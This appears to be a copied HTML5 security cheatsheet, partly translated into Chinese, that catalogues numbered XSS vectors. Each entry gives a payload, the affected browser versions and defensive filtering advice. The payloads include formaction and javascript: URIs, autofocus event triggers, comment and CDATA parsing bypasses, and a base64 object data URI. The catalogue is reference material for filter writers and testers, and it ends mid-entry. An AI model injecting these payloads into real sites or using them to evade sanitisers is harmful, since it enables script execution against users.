爱华网HTML5特性向量
通过formaction属性进行XSS - 需要用户进行交互 (1)#1test
这个向量展示了通过HTML5的form和formaction从外部劫持表单的一种方法.
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
不要让用户提交包含 "form" 和 "formaction"属性的标签.避免在form中出现id属性及提交按钮.
firefox 4.0
firefox 15.0
opera 10.5
opera 11.0
opera 12.0
opera mobile
chrome 10.0
chrome 23.0
safari 4.0.4
safari 5.1.7
xss
html5
opera
chrome
firefox
formaction
javascript
button
http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction
.mario
通过autofocus属性执行本身的focus事件#7test
这个向量是使焦点自动跳到输入元素上,触发焦点事件 - 无需用户交互
<input onfocus=write(1) autofocus>
检测用户提交的内容中是否含有"autofocus"属性
firefox 4.0
firefox 15.0
opera 9.0
opera 10.0
opera 11.0
opera 12.0
safari 4.0
safari 5.0
safari 5.1.7
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 23.0
internet explorer 10.0
xss
autofocus
chrome
opera
http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602
http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control
Gareth
通过多个autofocus竞争焦点来触发blur事件#8test
这里我们有两个HTML input元素竞争焦点,但焦点到另一个input元素时,前面那个将会触发blur事件
<input onblur=write(1) autofocus><input autofocus>
检测用户提交的内容中是否含有"autofocus"属性
safari 4.0
safari 5.0
safari 5.1.7
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 23.0
xss
autofocus
blur
chrome
safari
http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602
http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control
.mario
通过<VIDEO>的poster属性执行Javascript#10test
Opera 10.5+的poster属性允许使用javascript: URI.这个bug在opera11中已修复
<video poster=javascript:alert(1)//></video>
确保VIDEO的poster属性是相对URI、http URI和MIME-typed正确的data URI
opera 10.5
opera 11.00
opera 11.01
xss
poster
video
opera
html5
.mario
通过autofocus触发<Body>的onscroll执行Javascript.#12test
这个向量是使用autofocus移开焦点的方式来移动滚动条,这样就触发了<BODY>的onscroll事件
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
firefox 4.0
firefox 15.0
opera 9.0
opera 10.0
opera 11.0
opera 12.0
safari 4.0
safari 5.0
safari 5.1.7
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 23.0
xss
autofocus
scroll
chrome
opera
http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602
.mario
Form surveillance with onformchange, onforminput and form attributes#23test
Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
Make sure users cannot submit markup including the form, "onformchange" and "onforminput" attributes. Do not apply <FORM> elements with an "id" attribute.
opera 10.5
opera 11.0
opera 12.0
opera mobile
surveillance
javascript
opera
html5
onforminput
onformchange
http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#broadcast-formchange-events
Skyphire, .mario
JavaScript execution via <VIDEO> and <SOURCE> tag (1)#55test
Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags
<video><source onerror="alert(1)">
Make sure user submitted <SOURCE> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
opera 10.5
opera 11.0
opera 12.0
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 25.0
firefox 4.0
firefox 15.0
xss
javascript
video
source
html5
opera
chrome
audio
.mario
JavaScript execution via <VIDEO> and <SOURCE> tag (2)#56test
Firefox 3.5+ allows error handlers in <VIDEO> tags when applied with a <SOURCE> tag. The same works for <AUDIO> tags.On Firefox 4+ the <SOURCE> tag is irrelevant to trigger the error event. This happens because of the implicit "src" attribute in <VIDEO> tag when the page has a number sign (#) in the URL.
<video onerror="alert(1)"><source></source></video>
Make sure user submitted <AUDIO> and <VIDEO> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
firefox 3.5
firefox 3.6
firefox 4.0
firefox 15.0
internet explorer 9.0
internet explorer 10.0
xss
javascript
video
source
html5
firefox
audio
.mario
XSS via formaction - requiring user interaction (2)#72test
A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.
<form><button formaction="javascript:alert(1)">X</button>
Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes.
firefox 4.0
firefox 15.0
opera 10.5
opera 11.0
opera 12.0
opera mobile
chrome 10.0
chrome 23.0
safari 4.0.4
safari 5.1.7
internet explorer 10.0
xss
html5
opera
formaction
javascript
button
http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction
.mario
Passive JavaScript execution via <BODY> and oninput attribute#86test
All browsers besides Internet Explorer 9↓ support the "oninput" event handler around form elements like the given <INPUT>. The event works for the form elements itself, the surrounding form and <BODY> as well as <HTML> tags.
<body oninput=alert(1)><input autofocus>
Do not whitelist "oninput" attributes in user submitted markup.
firefox 3.6
firefox 4.0
firefox 15.0
safari 4.0
safari 5.0
safari 5.1.7
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 23.0
opera 9.0
opera 10.0
opera 11.0
opera 12.0
opera mobile
internet explorer 10.0
xss
javascript
html5
oninput
form
passive
event
Skyphire
Passive JavaScript execution via MathML on Firefox#130test
Modern Firefox versions allow usage of inline MathML. While other user agents don't support the href attribute for MathML elements (yet), Firefox does and thereby enables passive JavaScript execution. Note that supporting href for MathML elements is a feature - introduced with MathML 3. The same effect can be observed by using xlink:href. The statusline action further enables obfuscation of the actual link target - and in this example hides the JavaScript URI.
<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>
Do not allow users to submit unfiltered MathML content.
firefox 6
firefox 7
firefox 8
firefox 9
firefox 10
firefox 11
firefox 15
mathml
xss
inline
firefox
http://www.w3.org/Math/
https://bugzilla.mozilla.org/show_bug.cgi?id=534968
#87
.mario
Transparent overwriting of request-data using HTML5 "dirname" attributes#136test
Opera and Chrome support the HTML5 attribute "dirname", that can be used to have the browser communicate the text-flow direction of another input element by adding it to the server-sent request body. By injecting a "dirname" attribute in an existing form, an attacker can overwrite user input and thereby make it guessable for malicious purposes. The overwritten value would then be "ltr" or "rtl" - depending on the actual text-flow direction. The "dirname" attribute is not yet supported by Internet Explorer or Firefox.
<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>
Avoid white-listing the "dirname" attribute in user generated content. The effects on existing forms are hard to predict and might cause privacy problems and information leaks.
opera 12.0
chrome 22.0
chrome 23.0
chrome 24.0
chrome 25.0
html5
dirname
privacy
http
form
infoleak
http://dev.w3.org/html5/spec/common-input-element-attributes.html#the-dirname-attribute
http://html5sec.org/dirname/
.mario
HTML4和一些老的向量
JavaScript execution via <FRAMESET> and onload#31test
This classic vector shows that several tags don't need a "src" attribute to fire onload events, such as <IFRAME>, <BODY> and <FRAMESET>.
<frameset onload=alert(1)>
Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.
internet explorer 5.0
internet explorer 6.0
internet explorer 7.0
internet explorer 8.0
internet explorer 9.0
internet explorer 10.0
opera 8.x
opera 9.0
opera 10.0
opera 11.0
opera 12.0
opera mobile
firefox 1.x
firefox 2.0
firefox 3.0
firefox 4.0
firefox 15.0
chrome 3.0
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 23.0
safari 3.0
safari 4.0
safari 5.0
safari 5.1.7
xss
javascript
frames
classic
html
onload
.mario
JavaScript execution via <TABLE> and background#32test
Opera 8-10.5+ as well as Internet Explorer 6 support JavaScript URIs for <TABLE> and some other tags' "background" attributes. This causes JavaScript execution without user interaction. The problem has been fixed in Opera 11.
<table background="javascript:alert(1)"></table>
In case evil attributes like event handlers are being filtered from user submitted markup make sure not to forget "background" - among others.
internet explorer 6.0
opera 8.x
opera 9.0
opera 10.0
opera 11.01
opera mobile
xss
javascript
background
classic
html
table
.mario
HTML comment parsing issues (1)#37test
This vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments.
<!--<img src="--><img src=x onerror=alert(1)//">
Make sure comments are not allowed in user submitted html. The markup should be checked for security issues after comments have been stripped out - not before.
internet explorer 5.0
internet explorer 6.0
internet explorer 7.0
internet explorer 8.0
internet explorer 9.0
internet explorer 10.0
opera 8.0
opera 9.0
opera 10.0
opera 11.0
opera 12.0
opera mobile
firefox 1.0
firefox 2.0
firefox 3.0
firefox 4.0
firefox 15.0
chrome 3.0
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 23.0
safari 3.0
safari 4.0
safari 5.0
safari 5.1.7
xss
javascript
comment
parsing
attributes
sirdarckcat, .mario
HTML comment parsing issues (2)#38test
Besides <!---> the Internet Explorer allows to use <COMMENT> tags. The vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments. This example works up to IE 8 standards mode.
<comment><img src="</comment><img src=x onerror=alert(1)//">
Make sure <COMMENT> tags are not allowed in user submitted html. The markup should be checked for security issues after <COMMENT> tags have been stripped out or escaped - not before.
internet explorer 5.0
internet explorer 6.0
internet explorer 7.0
internet explorer 8.0
internet explorer 9.0
internet explorer 10.0
xss
javascript
comment
parsing
attributes
.mario
CDATA section parsing issues#39test
Firefox and Opera allow using CDATA section delimiters in HTML - in the stripped form "<![" as well as including padding like "<![CDATA[". This can cause problems for filter mechanisms since those delimiters can be used for massive obfuscation. Firefox 4 and Opera 11.60 have fixed the issue. However, modern browsers have a separate XML parsers for inline SVG or MathML, which allow to use the CDATA sections (including a little irregular shape).
<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
Make sure CDATA delimiters are not allowed in user submitted html. The markup should be checked for security issues after CDATA sections nd delimiters have been stripped out or escaped - not before.
opera 8.0
opera 9.0
opera 10.0
opera 11.0
opera 12.0
opera mobile
firefox 1.x
firefox 2.0
firefox 3.0
firefox 4.0
firefox 15.0
internet explorer 9.0
internet explorer 10.0
chrome 7.0
chrome 23.0
safari 4.0.4
safari 5.1.7
xss
javascript
cdata
parsing
attributes
math
svg
inline
LeverOne
Plaintext tags used for markup obfuscation#40test
This vector works on all tested user agents and shows how several filtering solutions can be tricked into accepting malicious HTML. A badly written filter will assume the error handler is part of the first image's "src" attribute and accept the incoming data.
<style><img src="</style><img src=x onerror=alert(1)//">
Don't rely on weak regular express for markup filtering. Use whitelists for allowed tags and rely on a filter solution based on a heavily tested tokenizer/parser.
internet explorer 5.0
internet explorer 6.0
internet explorer 7.0
internet explorer 8.0
internet explorer 9.0
internet explorer 10.0
opera 8.x
opera 9.0
opera 10.0
opera 11.0
opera 12.0
opera mobile
firefox 1.x
firefox 2.0
firefox 3.0
firefox 4.0
firefox 15.0
chrome 3.0
chrome 4.0
chrome 5.0
chrome 6.0
chrome 7.0
chrome 8.0
chrome 9.0
chrome 10.0
chrome 23.0
safari 3.0
safari 4.0
safari 5.0
safari 5.1.7
xss
javascript
plaintext
tags
parsing
attributes
LeverOne
Error handler via empty list-style and load handler via empty content#41test
Opera 10.5+ and earlier versions fire an error event for <LI> tags in case the background URL via style attribute cannot be loaded. The same works with "list-style-image" too. On Opera 10.10 and earlier more tag/style combinations like background:url() and background-image:url() work as well. Also works combination like content:url(svg), but at the moment it is sensitive to events and <script> tags before and after.
<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
opera 8.0
opera 9.0
opera 10.0
opera 11.0
opera 12.0
opera mobile
xss
javascript
css
background
opera
onerror
content
LeverOne, .mario
Link hijacking via <BASE> and JavaScript URI#42test
<BASE> link hijacking with JavaScript URIs works on Internet Explorer, Opera (O8-10.5 in case the link URL starts with #) and Safari. User interaction is required to execute the JavaScript. The vector sometimes has to be changed slightly to work for all mentioned user agents. Opera 11 ships a more or less working fix, but this problem continues to exist in difficult to exploit forms though.
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
User submitted HTML should not allow usage of <BASE> tags. In case they are necessary no non-HTTP/non-relative URL schemes should be allowed.
opera 8.x
opera 9.0
opera 10.0
opera 10.63
safari 3.0
safari 4.0
safari 5.0
safari 5.1.7
internet explorer 5.5
internet explorer 6.0
internet explorer 7.0
internet explorer 8.0
xss
javascript
opera
internet explorer
base
hijacking
brainpillow, Gareth, .mario
JavaScript execution via <SCRIPT> for and event attributes#48test
Internet Explorer allow using <SCRIPT> tags with "for" and "event" attributes to bind event data to specific html elements. The two shown attribute values cause script execution without user interaction. Opera simply ignores these attributes.
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
opera 10.0
opera 11.0
opera 12.0
opera mobile
internet explorer 6.0
internet explorer 7.0
internet explorer 8.0
internet explorer 9.0
internet explorer 10.0
xss
javascript
opera
for
event
internet explorer
.mario
JavaScript execution via <OBJECT> DataURL attribute#49test
Internet Explorer 9 and - in some situations - earlier versions support the use of JavaScript URIs for the "dataurl" attribute of a TDC Object. The JavaScript will be executed without user any interaction.
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
internet explorer 6.0
internet explorer 7.0
internet explorer 8.0
internet explorer 9.0
xss
javascript
internet explorer
object
dataurl
TDS
http://msdn.microsoft.com/en-us/library/ms531356%28v=VS.85%29.aspx#Understanding_the_TDC_Object_Model
.mario
JavaScript execution via <OBJECT> data#50test
Almost all browsers supporting data URIs allow executing JavaScript via crafted <OBJECT> "data" attribute value - even if base64 encoded.
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Make sure user submitted HTML cannot contain <OBJECT> tags or only whitelisted <OBJECT> "data" values.
opera 8.x
